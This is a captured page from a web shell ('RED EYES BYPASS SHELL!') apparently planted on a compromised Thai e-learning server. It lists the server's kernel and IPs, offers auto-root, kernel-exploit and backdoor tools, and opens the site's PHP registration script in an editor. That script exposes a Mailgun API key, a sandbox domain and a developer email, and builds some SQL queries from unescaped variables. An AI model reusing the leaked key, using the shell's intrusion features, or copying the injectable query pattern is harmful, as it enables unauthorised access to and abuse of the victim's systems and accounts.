Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
reg /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
conTroller.php
1.29
KB
-rwxr-xr-x
server.php
6.61
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.php
<?php require '../../vendor/autoload.php'; use Mailgun\Mailgun; require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { try { $data = json_decode(file_get_contents("php://input"), true); // $query = $db->query("TRUNCATE TABLE user"); // $query = $db->query("TRUNCATE TABLE status"); // $query = $db->query("TRUNCATE TABLE verification"); if ($data !== "") { $email = base64_decode($data["email"]); $stmp = $db->prepare("SELECT count(email) FROM user WHERE email LIKE BINARY :email"); $stmp->bindValue(":email", $email, PDO::PARAM_STR); if ($stmp->execute()) { $row = (int)$stmp->fetchColumn(); if ((int)$row !== 0) { http_response_code(405); echo json_encode(array("status" => false, "message" => "อีเมล์ถูกใช้งานแล้ว!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } $pass = base64_decode($data["pass"]); $status = base64_decode($data["status"]); if (!in_array($status, array('member', 'teacher'))) { http_response_code(405); echo json_encode(array("status" => false, "message" => "Data required!!")); exit; } $pass = password_hash($pass, PASSWORD_DEFAULT); $user = $data["user"]; $ip = $data["ip"]; $stmp = $db->prepare("INSERT INTO user (status,email, password, name,AuthToken,avatar) values (:status,:email,:pass,:user,'','file/users/user/userinvalid.webp')"); $stmp->bindValue(':email', $email, PDO::PARAM_STR); $stmp->bindValue(':status', $status, PDO::PARAM_STR); $stmp->bindValue(':pass', $pass, PDO::PARAM_STR); $stmp->bindValue(':user', $user, PDO::PARAM_STR); if ($stmp->execute()) { $id = $db->lastInsertId(); $sql = $db->prepare("SELECT * FROM status_backup where status = '$status'"); if ($sql->execute()) { while($row = $sql->fetch(PDO::FETCH_ASSOC)) { $status_row = $row["standart"]; $attributes = $row["attributes"]; $stmp_ins = $db->query("INSERT INTO status (userID, status, attributes) value ('$id','$status_row','$attributes')"); } }else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $charactersLength = strlen($characters); $token = ''; for ($i = 0; $i < 25; $i++) { $token .= $characters[rand(0, $charactersLength - 1)]; } $tokenHash = password_hash($token, PASSWORD_DEFAULT); $date = date("Y-m-d H:i"); $limit = date('Y-m-d H:i', strtotime('+15 minutes')); $query = $db->prepare("INSERT INTO verification (AuthToken, userID,date,send,IP) values (:auth,:id,:date,:send,:ip)"); $query->bindValue(':auth', $tokenHash, PDO::PARAM_STR); $query->bindValue(':id', $id, PDO::PARAM_STR); $query->bindValue(':date', $limit, PDO::PARAM_STR); $query->bindValue(':send', $date, PDO::PARAM_STR); $query->bindValue(':ip', $ip, PDO::PARAM_STR); if ($query->execute()) { $idver = $db->lastInsertId(); $url = "http://dwr8riew.com/work_181165/verify?AuthToken=" . $token . "&id=" . $idver; $newUrl = $url; $html = new DOMDocument(); $html->loadHTMLFile('../../template/Mail.html'); $html->getElementById('email-text')->nodeValue = $email; $html->getElementById('Code-Text')->setAttribute('href', $newUrl); $html->getElementById('Code-Text')->textContent = $url; $html->saveHTMLFile('../../template/Mail.html'); $html = file_get_contents("../../template/Mail.html"); $mg = Mailgun::create('f3fba5ad4aaf7626f659be4ec87a8a77-523596d9-2ea1195d'); $domain = "sandboxe8e1332c3df3415ebaeb89547b942510.mailgun.org"; $option = [ 'from' => "dwr8riew.com < rachatapon.dev@gmail.com >", 'to' => $email, 'subject' => 'Account Vetification', 'html' => $html ]; if ($mg->messages()->send($domain, $option)) { $_SESSION["lms-ID"] = $id; http_response_code(200); echo json_encode(array("status" => true, "message" => "success")); exit; } else { $sql = $db->query("DELETE FROM verification WHERE userID = '$id'"); $sql = $db->query("DELETE FROM user WHERE ID = '$id'"); http_response_code(405); echo json_encode(array("status" => false, "message" => "Failed to send Mail!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Data required!!")); exit; } } catch (Exception $e) { $sql = $db->query("DELETE FROM verification WHERE userID = '$id'"); $sql = $db->query("DELETE FROM user WHERE ID = '$id'"); http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; }
Close